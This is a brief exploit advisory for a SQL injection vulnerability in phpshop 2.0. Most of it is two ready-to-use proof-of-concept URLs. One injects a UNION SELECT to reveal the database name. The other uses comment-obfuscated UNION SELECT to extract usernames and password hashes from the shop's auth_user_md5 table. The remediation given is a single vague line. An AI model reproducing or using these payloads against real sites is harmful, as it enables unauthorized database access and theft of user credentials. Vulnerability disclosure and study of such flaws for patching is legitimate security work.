Title: phpshop 2.0 SQL Injection Vulnerability

Author: By onestree
Download URL: http://code.google.com/p/phpshop/downloads/list
Tested on: windows 7 / ubuntu

SQLi p0c:
==================
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

Fix:
Strengthen filtering.